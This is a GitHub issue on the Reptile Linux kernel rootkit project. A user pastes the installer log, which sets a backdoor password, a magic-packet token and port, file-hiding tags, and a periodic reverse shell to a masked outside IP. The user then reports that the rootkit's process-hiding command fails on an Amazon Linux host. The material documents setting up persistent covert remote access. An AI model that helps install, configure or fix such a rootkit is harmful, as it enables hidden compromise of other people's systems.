f0rb1dd3n / Reptile

LKM Linux rootkit
2.53k stars 571 forks source link

Hide processs faile #116

Open homelanmder opened 2 months ago

homelanmder commented 2 months ago

############################################################################ ############################ REPTILE INSTALLER ############################# ############################################################################ written by: F0rb1dd3n

SELinux config found on system! Checking SELinux status... clear

Hide name (will be used to hide dirs/files) (default: reptile): Auth token to magic packets (default: hax0r): Backdoor password (default: s3cr3t): Tag name that hide file contents (default: reptile): Source port of magic packets (default: 666): Would you like to config reverse shell each X time? (y/n) (default: n): y Reverse IP: ***** Reverse Port (default: 80): 666 How long is your interval? (in seconds) (default: 1800): 60

Token: hax0r Backdoor password: s3cr3t SRC port: 666

Reverse shell each X time: Reverse IP: ** Reverse Port: 666 Interval: 60

TAGs to hide file contents:

content to be hidden

Configuring... DONE! Compiling... DONE! Copying files to /reptile... DONE! Installing... DONE!

Would you like to remove this directory (/tmp/.X11-unix/Reptile-2.0/) on exit? (Y/N) [default: N]: n

this is install detail

uname -a : Linux ip-172-31-42-27.ap-east-1.compute.internal 4.14.268-205.500.amzn2.x86_64 #1 SMP Wed Mar 2 18:38:38 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

homelanmder commented 2 months ago

/reptile/reptile_cmd hide 9664 Failed!